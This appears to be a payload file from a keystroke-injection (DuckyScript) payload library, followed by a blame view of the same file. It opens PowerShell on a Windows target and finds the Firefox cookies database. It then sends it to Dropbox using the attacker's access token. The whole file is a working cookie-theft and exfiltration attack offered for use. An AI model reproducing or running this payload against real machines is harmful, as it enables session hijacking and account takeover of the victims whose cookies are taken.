omg-payloads/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt

REM ####################################################
REM #                                                  |
REM # Title        : Export Firefox Cookies Database   |
REM # Author       : Aleff                             |
REM # Version      : 1.0                               |
REM # Category     : Exfiltration                      |
REM # Target       : Windows 10-11                     |
REM #                                                  |
REM ####################################################


REM Requirements:
REM     - Firefox must be installed


REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
DEFINE DROPBOX_ACCESS_TOKEN "example"

DEFAULT_DELAY 500
GUI r
STRINGLN powershell
DELAY 2000


REM Get cookies DB path
STRINGLN_BLOCK
    $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
    $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
    $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN

REM Setting about exfiltration
STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
ENTER

STRINGLN_BLOCK
    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
    
    $dropboxFilePath = "/cookies_exported.sqlite"

    $headers = @{}
    $headers.Add("Authorization", "Bearer $accessToken")
    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
    $headers.Add("Content-Type", "application/octet-stream")

    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;
END_STRINGLN
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`REM ####################################################`
			`REM # \|`
			`REM # Title : Export Firefox Cookies Database \|`
			`REM # Author : Aleff \|`
			`REM # Version : 1.0 \|`
			`REM # Category : Exfiltration \|`
			`REM # Target : Windows 10-11 \|`
			`REM # \|`
			`REM ####################################################`


			`REM Requirements:`
			`REM - Firefox must be installed`


			`REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.`
			`DEFINE DROPBOX_ACCESS_TOKEN "example"`

Update payload.txt 2023-06-12 18:29:47 +00:00			`DEFAULT_DELAY 500`
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`GUI r`
Update payload.txt 2023-06-12 18:29:47 +00:00			`STRINGLN powershell`
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`DELAY 2000`


			`REM Get cookies DB path`
Update payload.txt 2023-06-12 18:29:47 +00:00			`STRINGLN_BLOCK`
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'`
			`$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath \| Where-Object {$_.Name -like "*default-release"}`
			`$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'`
			`END_STRINGLN`

			`REM Setting about exfiltration`
Update payload.txt 2023-06-12 18:29:47 +00:00			`STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN`
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`ENTER`

Update payload.txt 2023-06-12 18:29:47 +00:00			`STRINGLN_BLOCK`
Export Firefox Cookies Database 2023-06-12 10:10:53 +00:00			`$uploadUrl = "https://content.dropboxapi.com/2/files/upload"`

			`$dropboxFilePath = "/cookies_exported.sqlite"`

			`$headers = @{}`
			`$headers.Add("Authorization", "Bearer $accessToken")`
			`$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')`
			`$headers.Add("Content-Type", "application/octet-stream")`

			`Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;`
			`END_STRINGLN`